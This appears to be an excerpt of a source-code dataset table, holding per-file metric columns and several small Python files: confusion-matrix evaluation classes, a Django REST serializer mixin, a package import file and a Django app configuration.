| 43.407407 | 107 | 0.746587 | 159 | 1,172 | 5.09434 | 0.220126 | 0.155556 | 0.2 | 0.244444 | 0.834568 | 0.834568 | 0.793827 | 0.751852 | 0.702469 | 0.702469 | 0 | 0.01763 | 0.12884 | 1,172 | 26 | 108 | 45.076923 | 0.77571 | 0 | 0 | 0.266667 | 0 | 0 | 0.159556 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 1 | 0.266667 | false | 0 | 0.133333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
51f6e94c8edd436bf3279edcdbdce5297a655648 | 1,745 | py | Python | evaluations/confusion_matrix.py | sfvnDTU/deep_detektor | 3413b805b1d108480358a3f50ec5bb18b1d6845b | [
"MIT"
] | 3 | 2017-10-23T13:29:56.000Z | 2018-04-23T09:03:57.000Z | evaluations/confusion_matrix.py | sfvnDTU/deep_detektor | 3413b805b1d108480358a3f50ec5bb18b1d6845b | [
"MIT"
] | 1 | 2017-10-30T15:32:54.000Z | 2017-10-30T17:32:54.000Z | evaluations/confusion_matrix.py | sfvnDTU/deep_detektor | 3413b805b1d108480358a3f50ec5bb18b1d6845b | [
"MIT"
] | null | null | null | from evaluations.evaluation_base import Evaluation
import numpy as np
class TruePositives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum(np.array(y_true) * np.array(y_pred_binary))
def name(self):
return "TP"
class TrueNegatives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum((1 - np.array(y_true)) * (1 - np.array(y_pred_binary)))
def name(self):
return "TN"
class FalsePositives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum((1 - np.array(y_true)) * np.array(y_pred_binary))
def name(self):
return "FP"
class FalseNegatives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum(np.array(y_true) * (1 - np.array(y_pred_binary)))
def name(self):
return "FN"
class PredictedPositives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum(np.array(y_pred_binary))
def name(self):
return "PredP"
class PredictedNegatives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum(1 - np.array(y_pred_binary))
def name(self):
return "PredN"
class DataPositives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum(np.array(y_true))
def name(self):
return "DataP"
class DataNegatives(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return sum(1 - np.array(y_true))
def name(self):
return "DataN"
class Samples(Evaluation):
def __call__(self, y_true, y_pred, y_pred_binary):
return len(y_true)
def name(self):
return "Samples"
| 23.266667 | 74 | 0.66361 | 252 | 1,745 | 4.230159 | 0.154762 | 0.11257 | 0.154784 | 0.177298 | 0.750469 | 0.750469 | 0.729831 | 0.729831 | 0.697936 | 0.672608 | 0 | 0.004422 | 0.22235 | 1,745 | 74 | 75 | 23.581081 | 0.781135 | 0 | 0 | 0.382979 | 0 | 0 | 0.020057 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.382979 | false | 0 | 0.042553 | 0.382979 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
5c613d86c0de17dafe7d2afba418b328ecaf3410 | 129 | py | Python | platform/core/polyaxon/api/utils/serializers/build.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/api/utils/serializers/build.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/api/utils/serializers/build.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | class BuildMixin(object):
def get_build_job(self, obj):
return obj.build_job.unique_name if obj.build_job else None
| 25.8 | 67 | 0.736434 | 21 | 129 | 4.285714 | 0.714286 | 0.266667 | 0.244444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 129 | 4 | 68 | 32.25 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
7aad3b2a5a54896e51d2db957ce307491b4b68d5 | 71 | py | Python | scripts/utility/__init__.py | jjbrophy47/tree_deletion | 97041d129da335de3018b3243bc81943088abf24 | [
"Apache-2.0"
] | 1 | 2020-07-16T22:25:48.000Z | 2020-07-16T22:25:48.000Z | scripts/utility/__init__.py | jjbrophy47/tree_deletion | 97041d129da335de3018b3243bc81943088abf24 | [
"Apache-2.0"
] | null | null | null | scripts/utility/__init__.py | jjbrophy47/tree_deletion | 97041d129da335de3018b3243bc81943088abf24 | [
"Apache-2.0"
] | null | null | null | from . import data_util
from . import exp_util
from . import print_util | 23.666667 | 24 | 0.802817 | 12 | 71 | 4.5 | 0.5 | 0.555556 | 0.518519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15493 | 71 | 3 | 24 | 23.666667 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8fb7d8b97cd80a6309c3167a0c7ec890c7be5548 | 148 | py | Python | rest_framework_discovery/apps.py | ztroop/djangorestframework-discovery | a040eec861ff752e2981bc162ad7a18aa271f17a | [
"BSD-3-Clause"
] | 1 | 2018-04-23T22:40:58.000Z | 2018-04-23T22:40:58.000Z | rest_framework_discovery/apps.py | ztroop/djangorestframework-discovery | a040eec861ff752e2981bc162ad7a18aa271f17a | [
"BSD-3-Clause"
] | 6 | 2021-04-08T21:58:45.000Z | 2022-02-10T12:55:06.000Z | rest_framework_discovery/apps.py | ztroop/djangorestframework-discovery | a040eec861ff752e2981bc162ad7a18aa271f17a | [
"BSD-3-Clause"
] | null | null | null | from django.apps import AppConfig # pragma: no cover
class DiscoveryConfig(AppConfig): # pragma: no cover
name = "rest_framework_discovery"
| 24.666667 | 53 | 0.756757 | 18 | 148 | 6.111111 | 0.777778 | 0.272727 | 0.309091 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168919 | 148 | 5 | 54 | 29.6 | 0.894309 | 0.222973 | 0 | 0 | 0 | 0 | 0.214286 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.